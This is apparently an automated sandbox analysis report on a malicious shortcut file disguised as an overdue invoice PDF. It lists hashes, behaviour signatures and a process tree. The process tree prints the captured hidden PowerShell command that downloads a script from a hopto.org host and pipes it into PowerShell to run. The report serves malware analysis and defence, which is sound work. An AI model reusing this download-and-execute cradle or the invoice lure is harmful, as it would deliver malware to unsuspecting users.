Analysis
max time kernel: 31s
max time network: 33s
platform: windows7_x64
resource: win7-20221111-en
resource tags: arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
submitted: 06-02-2023 16:44
Static task: static1
Behavioral task: behavioral1
  Sample: Overdue_Invoice_2023.pdf.lnk
  Resource: win7-20221111-en
  5 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: Overdue_Invoice_2023.pdf.lnk
  Resource: win10v2004-20221111-en
  20 signatures, 150 seconds
General
Target: Overdue_Invoice_2023.pdf.lnk
Size: 1KB
MD5: 65247221e9addff22b50070ba1893bb6
SHA1: e373bac187d3faeba2d13cb5cf284b79c10f7d0c
SHA256: 9e9262ab44b3df0478357a790aa39abae9217e74349758e39db4bd7064597875
SHA512: a1a864489b98ddee67c21ee9014a6d3e44b1fd8790af9421b9d9515df7e06d6dbafc85b464424a51a48742d035ba25e423f8edb295107df5badc90c17e1babab
Score: 3/10
Malware Config
Signatures
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  Processes:
    pid   process
    756   powershell.exe
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   process
    756   powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description               pid   process
    Token: SeDebugPrivilege   756   powershell.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    description                         pid    process   target process
    PID 2040 wrote to memory of 756     2040   cmd.exe   powershell.exe
    PID 2040 wrote to memory of 756     2040   cmd.exe   powershell.exe
    PID 2040 wrote to memory of 756     2040   cmd.exe   powershell.exe
    PID 2040 wrote to memory of 756     2040   cmd.exe   powershell.exe
Processes
C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Overdue_Invoice_2023.pdf.lnk
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 Invoke-WebRequest 'http://billingservice.hopto.org/UY7G6S/f4Ag4.txt' -UseBasicParsing | Select-Object -Expand Content | powershell
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/756-88-0x0000000000000000-mapping.dmp
memory/756-92-0x0000000075FE1000-0x0000000075FE3000-memory.dmp (Filesize 8KB)
memory/756-93-0x0000000073CB0000-0x000000007425B000-memory.dmp (Filesize 5.7MB)
memory/756-94-0x0000000073CB0000-0x000000007425B000-memory.dmp (Filesize 5.7MB)
memory/2040-54-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmp (Filesize 8KB)